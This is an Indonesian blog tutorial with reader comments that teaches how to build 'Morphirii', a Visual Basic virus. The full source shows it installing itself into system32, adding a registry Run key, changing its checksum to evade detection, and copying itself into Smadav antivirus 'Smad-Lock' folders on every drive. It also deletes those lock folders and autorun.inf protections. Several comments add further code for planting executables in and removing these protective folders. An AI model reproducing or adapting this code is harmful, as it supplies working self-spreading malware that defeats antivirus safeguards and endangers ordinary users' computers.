MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Bagaimana kalau semua virus lokal bisa menembus Smad-Lock?

Posted by Morphic pada Januari 15, 2010


Bagaimana kalau semua virus lokal bisa menembus smad-lock?

Sebelum kamu membaca seluruh isi artikel ini, saya mau bertanya dulu. Apakah kamu sudah membaca artikel saya yang berjudul “Morphirii; Si penyusup Smad-lock”? Kalau belum baca dulu artikel itu baru baca artikel ini… Dan kalau sudah ada satu pertanyaan lagi.
Sudah dicoba blum Morphirii nya?

Si Morphirii bakal masuk menyusup ke dalam smad-lock. Mengcopykan dirinya ke dalam, lalu membuat satu pesan (satu file notepad) di dalamnya, sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Dulu rencananya trik ini tidak akan aku sebarkan. Tapi setelah aku berpikir sana dan berpikir sini, ternyata toh suatu saat bakal ada juga orang yang tahu trik ini.
Yah mudah-mudahan aja blog MorphostLab yang pertama kali ngepost trik ini.

Setelah didesak banyak orang (mail-ku dibanjiri banyak email masuk), akhirnya trik ini akan saya bocorkan juga. Sekedar memenuhi permintaan pembaca dan pengunjung MorphostLab.

Nah, sekarang buka VisualBasic-mu. Lalu masukkan referensi ”Microsoft Scripting Runtime.” Perhatikan gambar dibawah ini.

Kemudian masukkan satu listbox ke dalam form. Namai listbox tersebut list1
Lalu ketikkan source berikut:
Private Declare Function GetLogicalDrives Lib “kernel32” Alias “GetLogicalDrives” () As Long
Dim fso As New Scripting.FileSystemObject
Private Sub Form_Load()
ambilDrive
install
regist
End Sub

Sub regist()
Dim b As Object
Set b = CreateObject(“wscript.shell”)
b.regwrite “HKLM\Software\microsoft\windows\currentversion\run\Morphirii”, Environ$(“windir”) & “\system32\Morphirii.exe”
End Sub
Sub install()
MutasiKe Environ$(“windir”) & “\system32\morphirii.exe”
End Sub

Fungsi source diatas itu untuk menginstallkan diri ke dalam komputer korban dan membuat startup di regedit. Saya rasa semua sudah mengerti ini.

Function MutasiKe(Lokasi As String)
If fso.FileExists(Lokasi) Then Exit Function
ReDim KodeVirus(FileLen(App.Path & “\” & App.EXEName & “.exe”)) As Byte
Open App.Path & “\” & App.EXEName & “.exe” For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Put #1, , Format(Time, “hh:mm:ss”) & ” ” & Format(Date, “dd:mm”)
Close #1
End Function

Buat fungsi ‘Mutasike’ untuk trik polymorphic. Trik ini fungsinya untuk menghindarkan diri dari pendeteksian checksum file seperti crc32 dan md5. Yang ini saya rasa juga pada ngerti semuanya.
Setelah ini masukkan satu timer. Namai timer tersebut “Timer1” dan berikut ini source untuk timer tersebut.

Private Sub Timer1_Timer()
Dim i As Integer
ambilDrive
For i = 0 To List1.ListCount – 1
If fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)
ElseIf fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)
End If
Next
End Sub

Si Timer akan melaksanakan kerjanya yaitu mengerjakan suatu trik yang kita sebut “Do Trick”
Untuk intervalnya bisa kalian set sendiri…. Morphirii memakai interval 10000 (kira-kira 10 detik).
Lihat source di atas, virus kita ini bakal mengecek 2 jenis smad-lock! Smad-lock yang bertulisan “Brankas Smadav” dan yang satunya lagi tidak bertuliskan ”Brankas smadav”

Sub ambilDrive()
On Error Resume Next
Dim LDs As Long, lng As Long, sDrives As String
LDs = GetLogicalDrives
For lng = 0 To 25
If (LDs And 2 ^ lng) 0 Then
List1.AddItem Chr(lng + 65) & “:\”
End If
Next lng
End Sub

Code ini fungsinya untuk mencari drive-drive yang aktif. Code ini bisa diganti dengan yang code lebih baik.

Function DoTrick(drive As String)
fso.CopyFolder drive, App.Path & “\Hajar”
Open App.Path & “\Hajar\Read Me.txt” For Output As #1
Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii”
Close #1

Open App.Path & “\Hajar\Morphirii.txt” For Output As #1
Print #1, “Smad-Lock tidak lagi aman”
Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii”
Print #1, “”
Print #1, “Morphirii by: Morphic”
Print #1, “File ini bukan 100% virus”
Print #1, “hanya untuk uji antivirus anak bangsa…”
Close #1
MutasiKe App.Path & “\Hajar\Morphirii_2010.exe”
fso.CopyFolder App.Path & “\Hajar”, drive, True
fso.DeleteFolder App.Path & “\Hajar”
End Function

Ini adalah trik yang kita maksud. Morphirii akan mengcopykan dirinya ke dalam smad-lock, dan membuat satu file notepad di dalamnya sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Kalau kamu mau menghapus smad-lock-nya mudah saja….
Codenya begini:
Fso.DeleteFolder (List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916))
Atau
Fso.deletefolder List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)

Itupun setelah dilakukan pengecekan drive oleh Listbox yang tadi supaya tidak terjadi kacau balau ya…

Untuk penghapusan folder autorun.inf bisa dengan trik ini:
Sub hapusAuto(Dirname as strign)
On Error Resume Next
Shell (“CMD /C RD /S /Q \\.\\” & Chr(32) & Chr(34) & DirName & Chr(34)), vbHide
End Sub
Jadi untuk menghapus folder “F:\autorun.inf” codenya menjadi
hapusAuto “F:\autorun.inf”

sekian,
by: Morphic Karta

thanks to:
-Satryacode
-Yudha
-Shafry
-Yoga

44 Tanggapan to “Bagaimana kalau semua virus lokal bisa menembus Smad-Lock?”

  1. AGen x said

    ya sekarang gi mana cara menghapus ni Smadav???? gara-gara ni file-file ku yg gak penting gx bisa di buang… bagi yg tau cara ngapus nya tolong beri tauke e-mail ku ya…. (schon_xx@yahoo.com) THX

  2. joko said

    thank you cmua….. q mw bikin virus je…..

  3. VirSpector said

    Tolong dong!

    Saya ngegunain script kayak gini:
    MsgBox “SMAD” + ChrW(916) + “V”

    Harusnya yang dihasilkan kan: SMADΔV
    Tapi kenapa VB ngasilinnya malah: SMAD?V.

    Tolong dong cara memperbaikinya? Ada scriptnya?

  4. LeastTryIt said

    Ampun kk semua yg komen di atas… ternyata antivirus Smadlock nih mungkin kurang bagus.. mengingat pemikiran jenius kakak2 n abang2 yg di situs ini
    (wah.. Hidup n Maju Terus!)

  5. Roxx said

    # SMΔD-LOCK WAS HACKED BY ROXX🙂

    Ganti F:\ dengan alamat USB kamu…

    Dim Roxx As New Scripting.FileSystemObject

    Private Sub Form_Load()
    Shell “cmd /c copy c:\windows\explorer.exe ” & Chr(34) & “F:\” & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916), vbHide
    Roxx.CopyFile “c:\windows\explorer.exe”, “F:\” & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916) & “\explorer2.exe”, True
    Roxx.CopyFile “c:\windows\explorer.exe”, “F:\autorun.inf\con\aux\nul. This autorun.inf is LOCKED by SMAD” & ChrW(916) & “V to protect your Flash-Disk from virus infection. ” & “\explorer3.exe”, True
    End Sub

  6. Roxx said

    ini gw ada sourcecode tool buat hapus SMAD-LOCK buatan gw, cuma bubutuhin 1 Drive dan 1 command Button….. Silahkan Dicoba…🙂

    Maju terus VM indonesia…


    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

    Dim AUTORUN As String
    Dim SMADLOCK As String

    Private Sub Command1_Click()
    On Error Resume Next

    Sleep 100
    Shell ("CMD /C RD /S /Q" & Chr(32) & Chr(34) & AUTORUN & Chr(34)), vbHide ' Menghapus Folder Nul
    Sleep 100
    Shell ("CMD /C RD" & Chr(32) & Chr(34) & AUTORUN & "\con\aux" & Chr(34) & "\"), vbHide ' Menghapus Folder AUX
    Sleep 100
    Shell ("CMD /C RD" & Chr(32) & Chr(34) & AUTORUN & "\con" & Chr(34) & "\"), vbHide
    Sleep 100
    Shell ("CMD /C RD /S /Q" & Chr(32) & Chr(34) & AUTORUN & Chr(34)), vbHide
    Sleep 100
    Shell ("CMD /C RD /S /Q" & Chr(32) & Chr(34) & SMADLOCK & Chr(34)), vbHide

    If Len(Dir$(AUTORUN, vbReadOnly Or vbDirectory Or vbArchive Or vbNormal Or vbHidden Or vbSystem)) = 0 And Len(Dir$(SMADLOCK, vbReadOnly Or vbDirectory Or vbArchive Or vbNormal Or vbHidden Or vbSystem)) = 0 Then
    MsgBox " Gag ada yang dihapus nih ??? ", vbCritical, "Ngapain Lu.......!!!"
    Else
    MsgBox " Berhasil dihapus (^^,) ", vbInformation, "Smad-Lock Remover"
    End If

    End Sub

    Private Sub Drive1_Change()
    AUTORUN = Left(Drive1.Drive, 2) & "\autorun.inf"
    SMADLOCK = Left(Drive1.Drive, 2) & "\" & ChrW(916) & " Smad-Lock (Brankas Smadav) " & ChrW(916)
    End Sub

    Private Sub Form_Load()
    AUTORUN = Left(Drive1.Drive, 2) & "\autorun.inf"
    SMADLOCK = Left(Drive1.Drive, 2) & "\" & ChrW(916) & " Smad-Lock (Brankas Smadav) " & ChrW(916)
    End Sub

  7. maxx said

    Phic, keknya trik ini nggak berlaku buat lock smadav yang “Δ Smad-Lock (Brankas Smadav)Δ”. Karena pada windows yang fontnya udah diubah, pada salah satu tulisan di dalam kurung itu ada yang unicode juga, jadi cuman terbaca ‘□’ (kotak) aja. Klo nggak salah sih huruf ‘a’ pertama pada kata ‘Brankas’

    • Morphic said

      emang huruf ‘a’-nya juga unicode?
      ntar aku cek dulu ya….

      tapi setahu aku, aku ujicoba nih virus awalnya dismad-lock yg bertulisan “brankas smadav” itu..
      nanti aku cek lagi lah…

  8. VirSpector said

    Kagak kepikiran…

  9. Toni said

    Klo gt mah gampang mau dibikin pke bhs apa aj gw bisa.. Yg jd pertanyaanya apa morphviri bisa mengkopykan dirinya setelah berada di folder unicode..

    • Morphic said

      jawabannya tentu saja bisa…

      ingat trik Scripting.Filesystemobject!
      Scripting Runtime! (C:\windows\scrrun.dll)

      sebenarnnya dengan trik ini virus VBS pun bisa sesukanya keluar masuk folder unicode.

      CMIIW (correct me if i wrong)

  10. muamarkudo said

    eh, gmana dg surta lamaran ku? apakah msh ada lowongan?

  11. muamarkudo said

    wah…bagus22….keep coding bang…:D…

  12. shafry said

    dmn bos

  13. mankbut said

    yah phic codenya kok dsbrin sih? lok dsbarin mana bisa virus indonesia segera punah. kan malah smadav nya yg jadi punah.

    • Morphic said

      yah, mau gimana lagi….
      toh, suatu saat pasti ada orang yang pertama ngebocorin trik ini….

      lagipula, aku gk mau lagi emailku dibanjiri sama inbox-inbox yg maksa tutorial ni bisa keluar….
      yah….

  14. revil said

    hmm,,.. coba ah

  15. hehehehehehehehehehehehehehehehe
    mas morphic g nulis folder yang ada segitiganya
    hehehehehehe, pasti g bisa ya..?
    kog di tulis ‘ChrW(916)’ menunjukkan simbol segitiga
    paham…?
    hehehehehehehehehehehehehe
    ngakag terus

  16. shafry said

    gmbrnya aj deh biar tau formnya

  17. satryacode said

    listboxny d gunain utk apa phic??

  18. shafry said

    weleh bos buatin contoh yg ud jd donk

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: